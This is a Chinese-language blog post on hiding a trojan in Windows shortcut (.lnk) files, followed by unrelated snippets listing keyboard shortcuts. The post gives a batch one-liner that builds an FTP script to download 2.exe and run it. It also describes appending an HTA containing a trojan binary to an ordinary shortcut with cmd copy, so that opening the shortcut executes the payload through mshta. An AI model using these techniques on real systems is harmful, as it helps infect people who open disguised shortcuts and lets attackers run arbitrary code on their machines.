Windows快捷方式綁馬

2021-09-18 07:16:21 字數 1044 閱讀 8123

windows的shell32在處理控制面板程式的快捷方式檔案時,存在乙個漏洞,可以載入硬碟上的任意dll檔案,即可執行任意**。

echo open127.0.0.1>f&&echo 123>>f&&echo 321>>f&&echo get 2.exe>>f&&echo bye>>f&&ftp -s:f&&del /q f&&if exist 2.exe start2.exe
這裡注意區這裡 「>」 和 「>>」 ,第乙個是重定向(會覆蓋原內容),第二個是向檔案內追加內容

ftp命令中的-s引數是指定包含 ftp 命令的文字檔案;

選擇快捷方式的exe先隨便選乙個

修改執行方式,最小化。

lnk檔案後面接上html指令碼,html裡面包含2進製資料,用mshta就可以隨便執行2進製了

比如這裡1.hta裡面是我們需要執行的木馬二進位制,hacker.lnk是個正常的快捷方式

利用cmd的copy命令生成乙個新的惡意快捷方式

執行這個lnk。lnk把自己複製成hta執行,執行了惡意二進位制檔案

收藏

Windows快捷方式

alt esc 切換到上乙個操作的視窗 alt f4 關閉當前視窗 print screen 擷取當前全螢幕到剪下板 alt print screen 擷取當前視窗螢幕截圖到剪下板 alt shift 在輸入法之間切換 alt tab 切換當前開啟的視窗 alt shift tab 反向切換當前開啟...

windows快捷方式

以下是計算機中所有快捷鍵使用說明!單獨按windows 顯示或隱藏 開始 功能表 windows break 顯示 系統屬性 對話方塊 windows d 顯示桌面 windows m 最小化所有視窗 windows shift m 還原最小化的視窗 windows e 開啟 資源管理器 windo...

windows 7 快捷方式

快捷方式 常規常見任務 執行 操作方法 刪除所有載入項 windows 徽標鍵 r iexplore.exe extoff 啟用 自動完成 以便當再次開始鍵入 時,會自動填入 工具 internet 選項 高階 使用直接插入自動完成功能 更改選項卡在 internet explorer 中的工作方式...